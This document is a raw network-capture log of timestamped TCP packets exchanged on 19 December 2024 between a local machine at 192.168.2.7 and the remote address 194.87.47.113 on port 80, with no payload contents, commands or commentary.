Dec 19, 2024 08:47:27.709465027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.709563017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.709661007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.709672928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.709773064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.710411072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.710719109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.710838079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.711237907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.711426973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.711487055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.712024927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.712433100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.712553978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.712799072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.712979078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.713294983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.713634014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.713836908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.713885069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.714446068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.714811087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.715009928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.715188026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.715373993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.715460062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.715960979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.716150045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.716248035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.716778994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.716938972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.717057943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.717560053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.717753887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.717830896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.718338013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.718519926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.718566895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.719110012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.719369888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.719480991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.719937086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.720092058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.720144987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.720719099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.720937014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.720989943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.721510887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.721832037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.721945047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.722287893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.722529888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.722618103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.723114967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.723890066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.723902941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.723959923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.724224091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.724363089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.724657059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.725105047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.725228071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.725524902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.725538015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.725620985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.726274967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.726610899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.726705074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.727103949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.727310896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.727387905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.727917910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.728158951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.728215933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.728744984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.728897095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.728976965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.729417086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.729710102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.729811907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.730190992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.730577946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.730655909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.731003046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.731283903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.731340885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.870898962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.871191025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.871205091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.871329069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.871598959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.871612072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.871658087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.872201920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.872389078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.872575998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.872908115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.872961044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.890043974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.890356064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.890429020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.890593052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.890605927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.890695095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.891254902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.891640902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.891743898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.891982079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.892225981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.892343044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.893038988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.893052101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.893095970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.893412113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.893846035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.893863916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.893906116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.894597054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.894709110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.895394087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.895409107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.895545006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.895742893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.896193027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.896205902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.896249056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.896995068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.897042036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.897171974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.897530079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.897569895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.897665024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.898257971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.898313046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.898431063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.899085045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.899157047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.899461985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.899900913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.899914980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.899985075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.900629044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.900676966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.901057005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.902044058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.902122974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.902376890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.902755976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.902767897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.902810097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.904212952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.904226065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.904262066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.904870033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.904882908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.904912949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.905508995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.905523062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.905564070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.906229973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.906243086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.906294107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.907021046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.907033920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.907068014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.907763004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.907778978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.907854080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.908544064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.908564091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.908638954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.909277916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.909291029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.909333944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.910007954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.910022020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.910069942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.910573006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.910623074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.910979033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.911325932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.911338091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.911396980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.912540913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.912554026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.912607908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.912919044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.912933111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.912966967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.913578033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.913621902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.913881063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.914257050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.914269924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.914395094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.915080070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.915093899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.915144920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.915704966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.915766001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.916872025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.916886091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.916943073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.917218924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.917614937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.917629957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.917678118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.918262959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.918332100 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.918622017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.919035912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.919049978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.919105053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.919715881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.919804096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.920031071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.920494080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.920506001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.920567036 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.921221018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.921315908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.921452999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.922038078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.922059059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.922091961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.922880888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.922974110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.923455954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.923821926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.923834085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.923901081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.924525023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.924608946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.924848080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.925832033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.925843954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.925894976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.926455021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.926513910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.926825047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.927769899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.927783012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.927855968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.928442001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.928453922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.928502083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:27.929169893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.929182053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:27.929227114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.063103914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.063240051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.063338995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.063590050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.063936949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.064014912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.064307928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.064635992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.064697981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.065043926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.082221985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.082406998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.082772970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.082787991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.082819939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.082819939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.083452940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.083595037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.083803892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.084114075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.084415913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.084805012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.084877968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.084894896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.084894896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.085216999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.085655928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.085918903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.086415052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.086462021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.086467981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.086735010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.087265015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.087332010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.087734938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.087831974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.088031054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.088481903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.088633060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.088808060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.089051962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.089206934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.089690924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.089929104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.090054989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.090105057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.090531111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.090579033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.090830088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.091280937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.091386080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.091495991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.092067003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.092241049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.092616081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.092888117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.092895031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.093600988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.093872070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.094391108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.094753027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.094803095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.094803095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.094803095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.095195055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.095365047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.095423937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.096014023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.096847057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.096858025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.096864939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.097157001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.097635984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.097834110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.098541021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.098751068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.098751068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.098751068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.098823071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.099212885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.099220037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.099333048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.099927902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.100106955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.100728989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.100733042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.100933075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.101387024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.101663113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.101864100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.102305889 CET	80	49707	194.87.47.113	192.168.2.7
